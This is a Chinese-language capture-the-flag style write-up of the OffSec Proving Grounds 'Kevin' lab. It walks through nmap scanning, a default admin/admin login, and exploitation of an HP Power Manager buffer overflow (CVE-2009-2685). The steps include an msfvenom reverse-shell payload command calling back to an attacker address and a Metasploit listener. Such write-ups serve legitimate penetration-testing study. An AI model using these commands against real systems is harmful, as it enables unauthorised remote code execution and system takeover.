OSCP Kevin Write-up

一、靶场详情

靶场名称：

Kevin

靶场地址：

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界，获取管理员旗帜：

HP Power Manager 缓冲区溢出 –> system 权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描：

sudo nmap -p- 192.168.143.45 --min-rate=2000

PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
3573/tcp  open  tag-ups-1
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown

UDP 端口扫描：未发现有价值信息。

TCP 服务信息搜集：

sudo nmap -p80,135,139,445,3389,3573,49152,49153,49154,49155,49158,49159 -sCV 192.168.143.45

PORT      STATE SERVICE      VERSION
80/tcp    open  http         GoAhead WebServer
|_http-server-header: GoAhead-Webs
| http-title: HP Power Manager
|_Requested resource was http://192.168.143.45/index.asp
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
| rdp-ntlm-info:
|   Target_Name: KEVIN
|   NetBIOS_Domain_Name: KEVIN
|   NetBIOS_Computer_Name: KEVIN
|   DNS_Domain_Name: kevin
|   DNS_Computer_Name: kevin
|   Product_Version: 6.1.7600
|_  System_Time: 2025-09-09T15:44:32+00:00
| ssl-cert: Subject: commonName=kevin
| Not valid before: 2025-09-08T15:37:52
|_Not valid after:  2026-03-10T15:37:52
|_ssl-date: 2025-09-09T15:44:47+00:00; -1s from scanner time.
3573/tcp  open  tag-ups-1?
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Ultimate N 7600 (Windows 7 Ultimate N 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::-
|   Computer name: kevin
|   NetBIOS computer name: KEVIN\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-09-09T08:44:32-07:00
|_nbstat: NetBIOS name: KEVIN, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ab:95:9e (VMware)
| smb2-time:
|   date: 2025-09-09T15:44:32
|_  start_date: 2025-09-09T15:38:41
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h23m58s, deviation: 3h07m49s, median: -1s

系统为 Windows 环境，开放有 HTTP 和一些 Windows 默认服务。

3.2 渗透测试突破边界

3.2.1 HP Power Manager 缓冲区溢出得到系统 system 权限（CVE-2009-2685）

靶机 HTTP 80 端口可通过弱口令 admin/admin 进入系统后台，点击后台 help 得知应用版本信息：HP Power Manager 4.2 (Build 7)。

searchsploit 检索得知可能存在缓冲区溢出漏洞。

searchsploit HP Power Manager

复制漏洞利用脚本至当前目录。

searchsploit -m windows/remote/10099.py

根据脚本内容提示，需要使用 msfvenom 生成反弹 shell payload，但脚本没有详细介绍生成指令，搜索引擎检索，在另外的脚本中得到生成 payload 指令。

参考链接：

https://github.com/CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3

注意： -b 指定的参数需要是 searchsploit 复制脚本中注释行的 badchar 内容。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.236 LPORT=80  EXITFUNC=thread -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a' x86/alpha_mixed --platform windows -f python

使用搜索引擎得到的 EXP 利用过程存在报错，所以仅利用搜索引擎中脚本生成 payload 的指令，然后继续使用 searchsploit 复制的脚本执行攻击。

将 msfvenom 生成的 payload 写入到 searchsploit 复制的脚本中，注意： 需要将 buf += b 去除。

此时不能使用 nc 作为监听工具，必须使用 msf handler 模块监听，注意： 监听模块设置的 payload 需与 msfvenom 一致。

use exploit/multi/handler
set lport 80
set lhost 192.168.45.236
set payload windows/shell_reverse_tcp
run

执行 EXP，得到系统 system 反弹 shell。

python2 10099.py 192.168.143.45

3.2.2 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流，欢迎点击「关于我」，通过页面中的微信公众号、邮箱或 Discord 与我联系；若您发现文章中存在任何错误或不足之处，也非常欢迎通过以上方式指出，在此一并致以衷心的感谢。 😊🫡

最后，祝您生活愉快！🌞✨